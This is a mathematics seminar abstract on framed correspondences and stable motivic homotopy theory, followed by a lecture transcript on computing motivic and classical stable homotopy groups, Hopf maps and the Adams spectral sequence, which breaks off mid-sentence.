V. Voevodsky [6] invented the category of framed correspondences with the hope to give a new construction of the stable motivic homotopy theory SH(k) which would be more friendly for computational purposes. Jointly with G. Garkusha we used framed correspondences to develop the theory of framed motives in [4]. This theory led us in [5] to a genuinely local construction of SH(k). In particular, we get rid of motivic equivalences completely. In my lectures I will recall the definition of framed correspondences and describe the genuinely local model for SH(k) (assuming that the base field k is infinite and perfect). I will also discuss several applications. Let Fr(Y,X) be the pointed set of stable framed correspondences between smooth algebraic varieties Y and X. For the first two applications I choose k = ℂ for simplicity. For the further two applications k is any infinite and perfect field. (1) The simplicial space Fr(Δ^•_alg, S^1) has the homotopy type of the topological space Ω^∞Σ^∞(S^1_top). So the topological space Ω^∞_{S^1}Σ^∞_{S^1}(S^1_top) is recovered as the simplicial set Fr(Δ^•_alg, S^1), which is described in terms of algebraic varieties only. This is one of the computational miracles of framed correspondences. (2) The assignment X ↦ π_*(Fr(Δ^•_alg, X ⊗ S^1)) is a homology theory on complex algebraic varieties. Moreover, this homology theory taken with ℤ/n-coefficients coincides with the stable homotopy groups X ↦ π^s_*(X_+ ∧ S^1_top; ℤ/n) with ℤ/n-coefficients. The latter result is an extension of the celebrated Suslin–Voevodsky theorem on motivic homology of weight zero to the stable motivic homotopy context. (3) Another application of the theory is as follows. It turns out that π^s_{0,0}(X_+) = H_0(ℤF(Δ^•, X)), where ℤF(Δ^•, X) is the chain complex of stable linear framed correspondences introduced in [4]. For X = G_m^{∧n} this homology group was computed by A. Neshitov as the n-th Milnor–Witt group K^{MW}_n(k) of the base field k, recovering the celebrated theorem of Morel. (4) As a consequence of the theory of framed motives, the canonical morphism of motivic spaces can: C_*Fr(X) → Ω^∞_{ℙ^1}Σ^∞_{ℙ^1}(X_+) is Nisnevich-locally a group completion for any smooth simplicial scheme X. In particular, if C_*Fr(X) is Nisnevich-locally connected, then the morphism can is a Nisnevich-local weak equivalence. Thus in this case C_*Fr(X) is an infinite motivic loop space and π_n(C_*Fr(X)(K)) = π^{A^1}_{n,0}(Σ^∞_{ℙ^1}(X_+))(K). In my lectures I will adhere to the following references: [1] A. Ananyevskiy, G. Garkusha, I. Panin, Cancellation theorem for framed motives of algebraic varieties, arXiv:1601.06642. [2] G. Garkusha, A. Neshitov, I. Panin, Framed motives of relative motivic spheres, arXiv:1604.02732v3. [3] G. Garkusha, I. Panin, Homotopy invariant presheaves with framed transfers, Cambridge J. Math. 8(1) (2020), 1-94. [4] G. Garkusha, I. Panin, Framed motives of algebraic varieties (after V. Voevodsky), J. Amer. Math. Soc., to appear. [5] G. Garkusha, I. Panin, The triangulated categories of framed bispectra and framed motives, arXiv:1809.08006. [6] V. Voevodsky, Notes on framed correspondences, unpublished, 2001, www.math.ias.edu/vladimir/publications
|
10.5446/50948 (DOI)
|
Okay, so let me first of all say that I really very much appreciate the effort that the organizers and also that IHES have put into converting this event into a virtual format. We all know that this is not the style of event that we were hoping for, that we were wishing for, but I think it's really important that all of us at all levels of our society under these circumstances do the best in the circumstances that we have, even if those efforts are not ideal. Okay, so let's go ahead and get to work. So I'm going to talk over the next three hours about stable homotopy groups. So let me begin with some background, mostly classical about the stable homotopy groups and why these are things that we should care about computing. So S0, this is the name of the unit object in the stable homotopy category. And it's the unit object in the sense that if you smash any spectrum X with S0, you just get X back again. So it's the unit of that object and the stable homotopy groups are basically by definition, they are the graded endomorphisms of S0. They're the graded endomorphisms of the unit object. That's what we're talking about. And as we know from many examples, the endomorphisms with the unit object control the structure of the entire category. So these pi star actions, these actions by the endomorphisms have a lot to do with the structure of the entire category. So for one very concrete example, we could think about the class of two cell complexes. So two cell complexes are the of the spectra that you get by taking a sphere, a sphere spectrum, mapping it to another sphere spectrum, and then taking the cofiber. And then this SK, that's the shift of this one to begin with. So these two cell complexes X, of course, they're in correspondence with the elements of pi star. There's this map that you took the cofiber up to get X. So if you want to classify two cell complexes, you have to compute the stable homotopy groups. So that's one very naive way in which these elements of pi star tell you about other parts of the category. And so you might want to take this example of two cell complexes and extend it further. So what about, and in general, finite cell complexes are very much related to the structure of pi star, but in a more complicated way, more sophisticated way. So let's take a look at, as an example of that, let's take a look at a three cell complex. So I've drawn a picture over here on the left, which is sort of a schematic of what I want to do. I want to have a, I want to build a complex, right, and it should have S mod beta. It should have the two cell complex associated to beta as a sub complex at the bottom. And it should have the two cell complex associated to alpha as a quotient at the top. That's what this picture means sort of schematically. And so you can do this sometimes. Sometimes you can build a three cell complex where the bottom two cells are S mod beta and the top two cells are S mod alpha. However, it turns out there's an obstruction, you need a condition. And that condition is that you need the product alpha times beta or the composition alpha times beta as endomorphisms of S mod, an endomorphism of the unit object. That composition needs to be zero. That turns out to be an obstruction to constructing such a three cell complex. And then you could go further from this three cell complex and you could ask about, well, what about a four cell complex? So four cell complex, so the schematic looks is like this picture I've got over here on the left. Okay. 
And again, the idea is that we're building a four cell complex. It should have a certain three cell complex as a sub complex and a certain other three cell complex as a quotient, right? And so, and those quotients are going to be alpha, beta, and gamma, okay? So we already know from the previous example that you have to have that alpha, beta is zero in order for that top three cell complex to exist. And we also know that beta times gamma has to be zero for that bottom three cell complex to exist, okay? And then it turns out there's an additional obstruction. There's another obstruction to actually putting all of these things together into a single four cell complex. And that has to do with the Tota bracket alpha, beta, gamma, okay? You need this Tota bracket to vanish or at least to contain zero. Okay. So I haven't told you what a Tota bracket is, okay? And we will get later in these talks. We will get into a little bit of this sort of these sort of higher operations, this higher structure that one needs to study here, okay? But we won't be probably too precise about that. The point I want to emphasize here is that there's higher structure that you need to know about to solve sort of real tangible problems, okay? And then you can try to take this sort of cell complex idea to an extreme, right? And maybe now I've looked at some, what, you know, sort of a very much more complicated type of cell diagram, whatever this even means, right? And you could ask whether you can form a cell complex of this type over here on the right. And then it turns out, you know, there are some obstructions, right? What are the obstructions? Well, you know, to constructing this thing. And it turns out that there are, but they involve something that maybe you would call mixed length brackets that get even more complicated, okay? So on the one hand, this higher structure, like for example, in the four cell complex situation, on the one hand, this four cell complex, this higher structure does a very nice job of understanding how four cell complexes exist, but also things kind of get spiral out of control fairly rapidly when you try to study the general situation. And this is more or less equivalent to the fact that the stable homotopy groups are complicated and the stable homotopy category is complicated, and we wouldn't expect there to be necessarily a simple classification of arbitrary finite cell complexes. Okay, so here's the conclusion that I'd like to draw from these examples and from this sort of discussion. First of all, the most important thing, that pi star is not just a graded abelian group. It is a graded abelian group, okay? But it's much more than that, okay? It's also a graded commutative ring because you can compose endomorphisms, okay? But it's much more than a graded commutative ring as well, okay? The higher structure is an indispensable part of the structure of pi star, okay? You haven't really understood pi star unless you've understood all of this higher structure, okay? And that's something that people who, you know, spent time making explicit computations of stable homotopy groups spend a lot of time worrying about this higher structure, digging into it because it reveals so much of what's going on. Okay, and we'll talk about that higher structure at various points along the way. Okay, so everything I've said so far was sort of background motivation about classical stable homotopy theory, okay? 
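To make the obstruction pattern concrete, here is a minimal worked version of the two-, three-, and four-cell story just described; the cofiber notation S^0/α is chosen here for convenience and is not taken from the slides.
\[
S^{k}\ \xrightarrow{\ \alpha\ }\ S^{0}\ \longrightarrow\ S^{0}/\alpha
\]
is the two-cell complex attached along α ∈ π_k. A three-cell complex with S^0/β as the bottom two cells and a shift of S^0/α as the top two cells can exist only if the composite αβ = 0. A four-cell complex realizing α, β, γ in this way needs αβ = 0 and βγ = 0, and in addition the Toda bracket
\[
\langle \alpha,\beta,\gamma\rangle \ \ni\ 0,
\]
which is the extra obstruction mentioned above.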
And let me point out that much of this same story applies just as well in motivic or equivariant or other contexts, okay? The motivic stable homotopy groups or the equivariant stable homotopy groups will control finite cell complex constructions in those contexts as well, okay? However, there's an important caveat here, especially in the motivic context, right? Which is that not every motivic object is built out of cells, okay? It's cellular in the sense of built out of spheres. And so these stable homotopy groups are good for the cellular objects, but they're not necessarily so good for other types of objects, okay? The good news is that many of the most important motivic objects like the algebraic k-theory spectra, the island bearing McLean spectra, or the co-bordison spectra and so forth are cellular, okay? So it's still, so studying the cellular objects is, motivically, is still a worthwhile thing, okay? All right, so let's talk a little bit about sort of like the background about the contexts in which we're going to be working, okay? So in the upper left corner, I've got a little diagram here, right, of four categories and four functors, okay? In the upper left corner, I have the R-motivic stable homotopy category, okay? And then in the lower left corner, I have the C-motivic stable homotopy category. And those two categories, of course, are connected by the extension of scalars' functor, right? Okay? And then in the upper right corner, I have the C2-equivariant stable homotopy category. And in this situation here, C2 is really the Galois group of C over R. That's going to why it's C2 as opposed to some other group, okay? And Bette realization maps, goes from R-motivic homotopy to C2-equivariant homotopy, okay? Every R-motivic spectrum has sort of an underlying C2-equivariant spectrum, and that C2 action is the Galois action, right? Okay? And then finally, in the lower right corner, I have the classical stable homotopy theory, okay? And stable homotopy category. And then that receives functors, the forgetful functor from C2-equivariant, just forget the C2 actions, okay? And then, of course, the Bette realization from C-motivic homotopy theory, okay? So these four categories fit together very nicely, and these, we should think of these functors as being sort of very well-behaved computationally. We can really kind of understand them if we set our minds to it, okay? So the program that I'm proposing or I'm working on is that we should be working, we should be computing in all four of these contexts simultaneously, okay? Because the way they relate along these functors tells us a lot of information that the situation becomes much more rigid and much more easy to understand if we actually do all of these at once, okay? We're also going to consider k-motivic stable homotopy groups for some sort of general class of fields, k, all right? But maybe in less detail than the r-motivic and the c-motivic cases, okay? So let me defend that choice here. But let me defend that choice for a minute of why focusing on the r-motivic and c-motivic cases rather than the general field, okay? So the point for me is that the r-motivic and the c-motivic cases are the ones that are most closely related to classical homotopy theory, to classical topology, okay? So if you want to learn something about classical topology or if you want to borrow tools from classical topology, then the r-motivic and the c-motivic cases are the places where you're most likely to be effective, okay? So there's that, okay? 
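Schematically, the square of categories and functors being described is the following; this is only a sketch of what was said, with "Betti" standing for Betti realization.
\[
\begin{array}{ccc}
SH(\mathbb{R}) & \xrightarrow{\ \mathrm{Betti}\ } & SH_{C_{2}}\\
\downarrow \scriptstyle{\text{extension of scalars}} & & \downarrow \scriptstyle{\text{forget}}\\
SH(\mathbb{C}) & \xrightarrow{\ \mathrm{Betti}\ } & SH
\end{array}
\]
Here C_2 is the Galois group of ℂ over ℝ, and the C_2-action on the Betti realization of an ℝ-motivic spectrum is the Galois action.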
But also, maybe even more importantly, the r-motivic and the c-motivic cases are more accessible and so they're important tests for general theory, okay? And a great historical example of that is what happened over the last few years with Ada periodic homotopy, okay? So Ada, motivically the element, the half map Ada, is not nilpotent and we'll talk more about that in computational detail later, okay? But it's not nilpotent, which means you could invert it and still have something non-zero, okay? So you invert your Ada, okay? And you see what you get, you compute what you get, okay? And there was a series of projects with Berke you and myself, Andrews and Miller, Glenn Wilson, Kyle Ormsby, Oliver Rundigs, Tom Bachman, Mike Hopkins, and where we started, at the beginning of this series, we started looking at the c-motivic computations and we figured out what happened there. And then we went to the r-motivic computations and we figured out what happened there. And that led to ideas about what the general picture should look like over the rationals and then over general fields, okay? So there was this progression from specific cases that gave us hints about the general theory to the general case, okay? And that's exactly the way it played out. And so that's just sort of an important principle here and why we want to work through. All I'm saying here is we should do the easy cases first, right? That somehow summarizes this whole point. Okay. So let me make some comments about sort of standing assumptions and in general sort of philosophy for the series. Okay, so first of all, I'm always working stably. I may not always say stable homotopy or stable homotopy group or stable homotopy category, but I always mean stably. Everything we're going to do here is stably, okay? Lots of stuff are going on, lots of stuff going on here, unstable in motivic homotopy here, but that's not the subject of these talks. Okay, question. Are there other motivic fracture squares analogous to the real and complex version? So I think what, okay, so I think what's being asked there is that back to this upper left square, are there analogous squares like this for other fields? And the answer, if I understand the question correctly, I would say the answer really is no, right? There's something very special about the real numbers and the complex numbers and the way they relate to ordinary topology. One could try to do things with the at all homotopy types and so forth over general fields and that would probably, you know, and then general Galois groups and that would probably be a fairly interesting thing to do. But of course, there's all that complicated technology, pro technology that has to go into that sort of thing. And I don't know how like say computational that would necessarily be. Okay. So that's pro, but working out, you know, those ideas is probably, and a lot of those have been worked out, right? It's probably, you know, it's probably a worthwhile thing. Okay. And the other question is for the C2, Aquavariance, is this naive, Aquavariant? No, I mean the so-called genuine Aquavariant theory. I'm thinking about representation spheres and stabilizing with respect to all representation spheres. Okay. All right. Okay. So we're always working stably. Usually we'll have completed it at a prime. Okay. And usually that prime will be two. Okay. There are some places, some parts where things work integrally, but if you're going to do computations as a general rule, you have to work one prime at a time. 
That's just the price you pay for actually getting compute explicit computations out of things. Okay. And, you know, and there are ways of reassembling all this, you know, this primary data into, you know, integral stuff with, you know, with all the usual sort of like technology. Okay. The other standing is another standing assumption that I'm going to make is that I'm studying the stable homotopy groups here. There's another perspective on what sort of like these, the fundamental invariance of the motific homotopy category is, and that uses the idea of studying homotopy sheaves. Okay. And the, and the, the homotopy sheaves are more powerful in that they can then help you study objects that are not cellular. And so you can do much more interesting geometry and arithmetic with them. The downside of course is you, you lose a certain amount of explicit computational ability when you're working with these abstract sheaves. Okay. And the relate the connection between them is that the homotopy groups that I'm studying are the global sections of the homotopy sheaves. Okay. So that's what we're going to be talking about. Okay. And I sort of, as I already alluded to before, we will complete as necessary to make whatever spectral sequence we're studying will complete as necessary to make that thing converge. That might mean completing at a prime P that might mean completing at that hop also completing at the half map Ada. You might have to do something where you take the effective completion of a spectrum and so on and so forth. Okay, so I am not going to make a big deal about this out of this completion stuff. Okay. Generally speaking, it, it, there is some work to be done about these convergence issues and about the behavior of these completions. And typically this work is manageable. Okay. It's not trivial, but it's manageable. Right. And so we can get these spectral sequences to converge in in reasonably nice ways. Okay. My job is not to worry about the convergence. My job is to sort of figure out what the computations are. Right. And so that's what we'll talk about. Okay. Question. Is it then known that about a homo, what about a homotopy sheaf version of the Motivic Adams spectral sequence? So that is a good question off the top of my head. I have never thought that through maybe some other people here have some idea that my instinct tells me that it would, that it should work just fine. The problem is that in abstractly, you should be able to set up such a thing just fine. That might, however, it's not at all clear that you're going to be able to make this sort of fundamental computations to get things off of the, off of the ground. Okay. And then sort of related question there. What you lose specifically when you work with the homotopy sheaves is that you, that, that maybe the spectral sequences exist, but there's, there's sort of the, there's another thing that you need besides the existence of the spectral sequence. The other thing you need is some input computations that you have to start with. Right. And so what, for example, when you're thinking about the Adam spectral sequence, and we'll get to this in a little bit, but so this is a little bit of a preview. But when you think about the Adam spectral sequence, you can set it up abstractly, but that's only useful if you know what the Colm Algebra point is and you already know what the Steering Algebra is. If you have no idea what the Steering Algebra is, right, then the Adam spectral sequence is nothing more than an abstract toy. Okay. 
So that's the problem with, with, with the sheaves, right? If you're going to sort of work with the sheaves, you're probably going to, I don't, I, I don't know, I don't want to speculate right here live about what you're going to need, but, but I have a feeling that those sort of those input computations are, are, are just kind of like, you know, not really things you can write down. Okay. All right. So we'll complete as necessary. And then finally, one last comment here about, just about notation is that the grading convention that I will adopt is, you know, in this form P comma Q, this is the, this is the grading convention that Bavadski used. P is like the topological degree. Q is the motific weight. And then P minus Q is some, is frequently a quantity that one wants to study and, and I'll call that the co-weight. Okay. Because it's sort of a partner to sort of a partner sort of dual in a sense to weight. Okay. And this does not agree with the notation that all authors have used on the, in the subject, but it's the one that I'll stick with. Okay. Consistently. All right. So even before we get, we are certainly headed for the atom spectral sequence. That is the sort of like the first big tool that we're going to use. But even before we get to the atom spectral sequence, let's do, let's go back to sort of like prehistory even before that, before the atom spectral sequence was used to study stable homotovic groups, there were some more geometric constructions, okay, that, that work in sort of very low degrees. Okay. So what about that style of, of, of constructing stable homotovic elements? Okay. So, and some of these ideas are due to, many of these ideas are due to Morrell. Some are written down by Duggar and myself, and then who in Creole as well have contributed, contributed at various points along this way. Okay. So these geometric constructions, the good thing about these, these constructions is that they are universal. Okay. They work over spec Z and therefore automatically are going to work in sort of over any base. Okay. In the, in the motivic context over any base. Okay. All right. So the first element that I want to discuss is the element row. Okay. In pi minus one minus one. Okay. So this element row can be constructed. You take plus or minus one and you complete it, conclude it, include it into GM. Okay. And just as a matter of notation, GM here, I just mean a one minus zero. Take the affine line, I puncture it, and then that's GM. That's, you know, for the multiplicative group, whatever, but we won't really need that GM. Well, anyway, it's GM. It's a more convenient notation. You include plus or minus one into GM, you get something that turns in some cases turns out to be non-trivial. Okay. And we'll call that row. Okay. More generally, you can include one and some unit U into GM. Okay. And get an element of, of pi minus one minus one that we could maybe call bracket U. Okay. And then row is another name for bracket minus one. Okay. Row comes up so frequently that we give it its own name and these bracket U's in general are a little more obscure. Okay. So these are already some geometric constructions. Okay. Closely related to the arithmetic of the field. Right. Okay. Oh, and why is it minus one, minus one, right? Because this is an S zero, zero, and this is an S one one, and then the relative degree is minus one, minus one. Okay. Then there's an element epsilon in pi zero, zero. So that's the twist map. You have GM, smash GM. You have a symmetry, right? 
Swap the factors to GM, smash GM. The relative degree there is zero, comma zero. That's in pi zero, zero. Okay. And because it's a twist map, not surprisingly, this epsilon controls commutativity. And we'll write down a formula in a minute for what exactly I mean by that. But epsilon is, is essential if you're going to want to study some form of commutativity. Okay. So now, so the, those are sort of like the elementary like most naive, you know, some of the most naive things you could think of. Okay. And now things get a little more interesting. Okay. And so you borrow an idea from very classical topology, right? From, from at least as far back as Hopf, right? Okay. So, and you can construct a Hopf map eta. Okay. In pi one, comma one. I'm going to construct eta in a way that's, it's probably not the most common, it's probably not the way that most people who have seen this before think of, of, of eta. Okay. But it's, it's, it's useful for a certain perspective. Okay. So eta is in pi one one. So here's what I do. Okay. Start with GM cross GM. Okay. And it has a multiplication map to GM, right? GM is a group, right? And then suspend it once. That's what the suspensions are. Okay. So this mu is really suspension of you. Okay. So there's that map mu. Okay. It turns out for very general reasons. Okay. After one suspension, a product always splits. Hey, this is a very general fact about, about homotopy theory. And so this, so this, this product splits. And one of the some ends of this splitting is the suspension of GM, smash GM. Okay. So there's this inclusion here, right? That comes from this very general categorical splitting. Okay. So now you have a map from suspension GM, smash GM into suspension GM. Okay. That composition. And you go and you count the degrees. What do you have here? So one, two, three spheres, two twists, right? So three, two. Here you have two spheres and one twist. And so you have two, one. Okay. And then the relative degree is one, one. Okay. So there is, there is a map. Okay. And that map, that's the same. The way that people usually think about Ada as the projection from a two minus zero down to P one. Okay. And this is the same map or maybe it's off by a minus sign, but it's essentially the same map as, as that construction. Okay. And, oh, the other thing, you know, I should have said this at the beginning actually, you know, all of these geometric constructions that I'm doing here are, are, are unstable, right? I'm actually doing unstable constructions here and then stabilizing them, right? In order to get stable homotiltons. But this map Ada really exists in S three, two to S two on unstable. Okay. And so, so there's Ada. Okay. And then, you know, from classical topology that the Hofmaps don't end at Ada that there are higher dimensional analogs of these things. And so we'll take a look at the next one. Okay. New. All right. So here's what you can do with new. You can take the group SL two. Okay. That's of course a group. And then, and you have the multiplication map, right? After one suspension from S suspension, SL two cross SL two, do suspension SL two. Okay. And again, this categorical splitting, right, gives you a map from suspension SL two, smash SL two into suspension SL two. Okay. Now, here's the interesting fact. It turns out that SL two has the homotopy type of S three, two. Okay. That's not a hard, that's a relatively easy geometric thing you can do. 
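To keep the degrees straight, here is a summary of the low-degree constructions so far, in the (p, q) = (topological degree, weight) convention fixed earlier; this only restates what was said above.
\[
\rho=[-1]\in\pi_{-1,-1},\qquad [u]\in\pi_{-1,-1}\ \ (u\in k^{\times}),\qquad \varepsilon=\text{twist on }\mathbb{G}_m\wedge\mathbb{G}_m\ \in\pi_{0,0},
\]
\[
\eta:\ S^{3,2}\simeq\Sigma(\mathbb{G}_m\wedge\mathbb{G}_m)\ \longrightarrow\ \Sigma\,\mathbb{G}_m\simeq S^{2,1},\qquad \eta\in\pi_{1,1},
\]
where the first map comes from the splitting of the suspended multiplication on G_m, using G_m ≃ S^{1,1} and A^2 − 0 ≃ S^{3,2}.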
As for SL2 having the homotopy type of S three, two: you just look at the columns, the determinant has to be one, and you can contract things down and get that equivalence. That's not a very hard fact, but it's an observation. Okay. And so then each copy of SL2 is an S three, two, and you go and count degrees, and you end up with a map from S seven, four to S four, two. Okay. And then that gives you a construction of nu that works unstably and it works over any possible base. Okay. Finally, something weird happened here, hang on a second; this is supposed to be S seven, four. Okay. Now, with sigma, a new complication arises. The new complication is that you can't model sigma as this kind of Hopf construction on a group object. Okay. What you have to use is a non-associative multiplication. Okay. But you can show that over any base, S seven, comma four has a non-associative multiplication. Okay. And then you use that non-associative multiplication in the same way as before, using that splitting, to get a map from S 15, comma eight to S eight, comma four, and that's pi seven, four. Okay. So great. So that's the classical stuff. Right. And now we know from classical history that you can't really expect to go much further at this sort of naive level; there's something more sophisticated that you have to do if you really want to go further. Okay. But before we dive into those more sophisticated techniques, let's talk a little bit. So we've got these elements rho, bracket u, epsilon, eta, nu, and sigma, and let's talk a little bit about relations amongst these things. Okay. So Hu and Kriz proved a very nice result. It's basically a Steinberg relation: bracket u times bracket one minus u always equals zero. Okay. And epsilon squared is one; epsilon was the twist, and so if you twist twice, of course, you get the identity. Okay. Then the formula I wrote down here, the formula for graded commutativity: if you want to compare alpha beta and beta alpha, what you have to do is possibly put in a minus sign and possibly put in an epsilon factor, depending on the degrees of alpha and beta. The exact formula here is not so important right now; you can look it up later if it's a formula that you want to use. But the point is, if you do the diagram chasing and you figure out exactly what happens when you swap factors around, you have a plus or minus one and maybe an epsilon in there as well in order to switch things. Okay. And that's a really interesting wrinkle. Classically we see the minus one; we don't see the epsilon. That's a really interesting wrinkle. Okay. You can show that rho times one minus epsilon is zero. You can do this geometrically; you can construct complexes and show that this factors through something contractible, right? Same thing with eta times one minus epsilon, eta times nu, and nu times sigma. You can show all of these relations geometrically, by constructing objects that are contractible that these compositions factor through. Okay. And of course, for those who know about this stuff, what you're seeing on this slide is a lot of information about Milnor-Witt K-theory, right? Some of what's going on in Milnor-Witt K-theory is appearing in some of these formulas.
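Similarly, the higher Hopf maps and the relations just listed can be recorded as follows; the last line gives one common form of the graded-commutativity rule, with the caveat from the talk that the precise sign conventions vary between sources.
\[
\nu:\ S^{7,4}\simeq\Sigma(SL_{2}\wedge SL_{2})\ \longrightarrow\ \Sigma\,SL_{2}\simeq S^{4,2},\quad \nu\in\pi_{3,2};\qquad
\sigma:\ S^{15,8}\longrightarrow S^{8,4},\quad \sigma\in\pi_{7,4};
\]
\[
[u][1-u]=0,\qquad \varepsilon^{2}=1,\qquad \rho(1-\varepsilon)=0,\qquad \eta(1-\varepsilon)=0,\qquad \eta\nu=0,\qquad \nu\sigma=0;
\]
\[
\alpha\beta=(-1)^{ac}\,\varepsilon^{bd}\,\beta\alpha\qquad\text{for }\alpha\in\pi_{a,b},\ \beta\in\pi_{c,d}.
\]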
Milnor-Witt K-theory is saying even more than that, and I don't want to get into that in these talks, but I just want to make a nod to that whole circle of ideas, which you can develop further. Okay. So instead I'd like to go in a different direction. Okay. So how might you go deeper? How might you produce more stable homotopy elements? Okay. So one thing you could do is follow Toda's classical work. So Toda carried out some amazing stable homotopy group computations with really very little technology. Without using things like the Adams spectral sequence, he was able to go remarkably far into the structure of the classical stable homotopy groups, and you could try to follow the kinds of approaches that he adopted. For example, you could use Toda brackets. Okay. So a Toda bracket is a way of building new stable homotopy elements out of old ones. It's kind of like composition, but more sophisticated. Okay. And we've talked a little bit about that; this is part of the higher structure of the stable homotopy groups. Okay. So the first example that occurs is this Toda bracket that I've written down on the screen: eta, comma, one minus epsilon, comma, nu squared. Okay. And it turns out that we know geometrically that eta times one minus epsilon is zero; I already wrote that relation down. And then it also turns out that one minus epsilon times nu squared is also known to be zero. Okay. And those two relations make this Toda bracket defined in pi eight, five. Okay. And that thing exists. Again, this is all over Spec Z, right? This is universal, or even unstable, right? You can even make this an unstable Toda bracket. This all works in complete generality. Okay. And you could try to go further, right? But it gets harder and harder and more and more ad hoc. Well, you could do it, but this is as far as people have really gone in this direction. And again, I do think that people could go further if they decided to sit down and think it through. Okay. So this is kind of the end. Okay. All right. So now we come to a turning point in the history of stable homotopy groups, right? The advent of the Adams spectral sequence. Okay. So the Adams spectral sequence is, of course, due to Adams, right? But one should give a certain amount of credit to Serre as well. Right. So Serre had these ideas about computing homotopy groups by this method of using the cohomology of Eilenberg-MacLane spaces, and to a large extent, what Adams is doing is systematizing and organizing the kind of ad hoc approach that Serre was trying to describe. Okay. Question: do we have motivic Mahowald root invariants defined? So yes, there are root invariants running around in this story. There are a few different things you could mean by that. Okay. The short answer is that you should look at JD Quigley's work. JD Quigley has written a couple of papers, I think, about motivic homotopy theory and root invariants. He has shown how to construct these things in some level of generality that I forget off the top of my head, and he has carried out some computations, right, and is kind of indicating what maybe these things are good for.
And there's another sort of, let me just, since we're on the subject of root invariants, let me also say that one of the ongoing projects that I and some of my co-authors have is to use R-motivic homotopy theory to further our knowledge of classical root invariants. I think that R-motivic homotopy theory can beat the classical topologists at their own game, that we can do better at computing root invariants if we use a little bit of motivic homotopy theory. Okay. All right. And it looks like in the chat there was a link posted to JD Quigley if you want to know more about motivic root invariants. That's a good question. Okay. So we're going to talk about the Adams spectral sequence. Okay. So this is supposed to be a summer school, right? And this is the first week of this summer school. And so I decided to spend a certain amount of time covering what's really background, right? And so I want to talk in some detail about what the Adams spectral sequence is, about how you construct it, and why this particular construction ought to be something useful and interesting. Okay. So this next part of the talk is really all classical review. Okay. And then I'll say some things about the motivic and equivariant variations that come up, maybe at the end. Okay. So I'm going to write H for HFp, right, the mod p Eilenberg-MacLane spectrum at a prime. Okay. And I write p, but really in my own head I think p equals two, because I'm always working at two, but I guess we don't need to do that here. Okay. So H star, right, the coefficients of H, is Fp, right? That's easy enough. Okay. And then the other thing we need is H star H, or in other words, the homotopy of H smash H. Okay. And that's the dual Steenrod algebra, A star. Okay. Which is a Hopf algebra. Okay. So it has a multiplication and a co-multiplication. Okay. So this A star, it's kind of complicated. I'm not writing down the formulas for it right now, although we will write down formulas later. Okay. But the point is that it is completely explicit, completely known. Okay. The other thing that I'm doing is that I am always writing the dual Steenrod algebra. In this entire series, I am never going to talk about the Steenrod algebra; I'm only going to talk about the dual Steenrod algebra, because it turns out that the computations work out much more nicely in the dual case. Of course, in some philosophical sense they're equivalent; all you're doing is dualizing over a field. But the formulas are much nicer to write down in the dual situation. And so that's one of the early obstacles that a lot of students have to diving into this subject: making the transition from the Steenrod algebra, which is more natural psychologically, to the dual Steenrod algebra, which is much easier to work with in practice. Okay. So that's something that you kind of have to train yourself to spend some time doing; you have to train yourself to think in those dual terms. Okay. So there is a unit map from the sphere to H. Okay. And then that gives you, if you take the fiber, you get a cofiber sequence, and that's the definition of H bar. Okay. So H bar is like the difference between the sphere and H. Okay. And that looks like sort of just an arbitrary thing.
There's no motivation for that. Okay. But here's a little bit of motivation, right. If you look at the homotopy groups of H smash H bar, right, what you end up doing is you end up taking A, you get A bar, right, which is the augmentation ideal of the dual steamer and algebra. So, H smash H bar has a nice algebraic interpretation, right. It's a topological thing, right. But algebraically, it's corresponding to taking the augmentation ideal. Okay. All right. So, here's, so that's the ingredients that we need. Okay. So, that's how you construct an atoms resolution. Okay. So, you start with, here's this cofiber sequence that we just talked about on the left. Those two maps make a cofiber sequence. Okay. And then if you take that cofiber sequence and you smash it with H bar, right, take each of these three objects and smash them with H bar, you get these three objects. Okay. And so, those three objects also form a cofiber sequence. Okay. And then if you take those three objects and you smash them again with H bar, you get those three objects and you get another cofiber sequence. Okay. So, in this picture, each of these L shaped, these three terms in a shape of an L form a cofiber sequence. Okay. The row itself is not any kind of exact thing. It's more of like of a resolution or something like that. Okay. All right. So, whenever you have this kind of sequence of nested cofiber sequences, right, you end up with a spectral sequence. Okay. The spectral sequence starts with the homotopy of these third terms, this H, this H smash, H bar, H smash, H bar, H bar, and so on and so forth, starts with the homotopy of these third terms and it converges to the homotopy of S zero. Okay. The other way of thinking about this is that here's S zero and you filter S zero along this tower. This is like a filtration of S zero and then these are the associated graded. These are the layers of the filtration, like the associated graded. That's another good way of thinking about it. And that's what a spectral sequence does, right? It goes from the layer, it passes from the layers to the whole object, right? And so that's exactly what you get here. So, the E one page of this spectral sequence has the homotopy of all these guys, right? And it converges to the homotopy of the sphere. Okay. And then to make this converge, you need some P completions here, right, for convergence. And that's okay. You've chosen a P up at the very beginning here, right? And so there's some convergence there, but that's that, which again, you know, as I've said, is manageable, right? There's some things to do, but it's manageable. Okay. So, this looks fine, right? But what's really going on here? Why would you do this? Why, what makes this sort of anything useful other than just some like arbitrary, like, you know, crazy arrows that I've written down on the screen? Well, it turns out that this E one page is totally computable, right? We know a lot about H smash H bar, H smash H bar. I wrote that down earlier. That's the augmentation ideal. Okay. And it turns out when you smash with more powers of H bar, it still is computable. Okay. And so what you get in this E one page, this E one page, I've written it out here more explicitly. Okay. You get an F two, that's from H, that's the homotopy of H, you get an A bar, that's the homotopy of H smash H bar. And then you get the second tensor power of a bar. That's what this homotopy turns out to be. That's not very hard. 
It's a little bit of a computation and you can get that that's the second tensor power of a bar. And then the third tensor power and the fourth tensor power and so on and so forth. Okay. So, this E one page, this has a name. This is this is called the cobar complex of a. Okay. So, we'll talk a little, we'll talk in more detail about this thing later and carry out some computations. Okay. What this thing is, is a differential graded algebra whose homology is the X groups of the ring A over with coefficients in F two comma F two. Okay. So, this cobar complex is sort of like, it's kind of, it's a fundamental object. Right. It's a key tool for computing X. Okay. And this observation, I think is really now that I've written this down, I think now you can go back and you can look at the motivation for what the atoms resolution is doing. Okay. When you want to study the higher invariance of a ring F two because you're taking the prime two. Yeah, exactly. That's a typo. That could be, these can be those, those twos should be P's at this level. I just, I always forget because I literally like I eat and breathe and sleep P equals two and so I just, I constantly forget that. Okay. So, so when you want to study the higher invariance of a ring, we know what to do. We take a resolution and we take derived, you know, X and all that and tour and all that sort of stuff. Right. We take, we do that sort of thing and the cobar complex is a nice convenient tool for those resolutions and doing those kinds of derived constructions. Okay. So what's happening here in this atoms resolution is you're doing, you're trying, you're trying to, you're playing out that same story, right? Of looking, of taking resolutions and looking for higher invariance, but instead of doing it in algebra, you're doing it in topology. You're using the spectra themselves to build the resolution, right? But you're really mimicking the algebraic situation here in topology. Okay. So 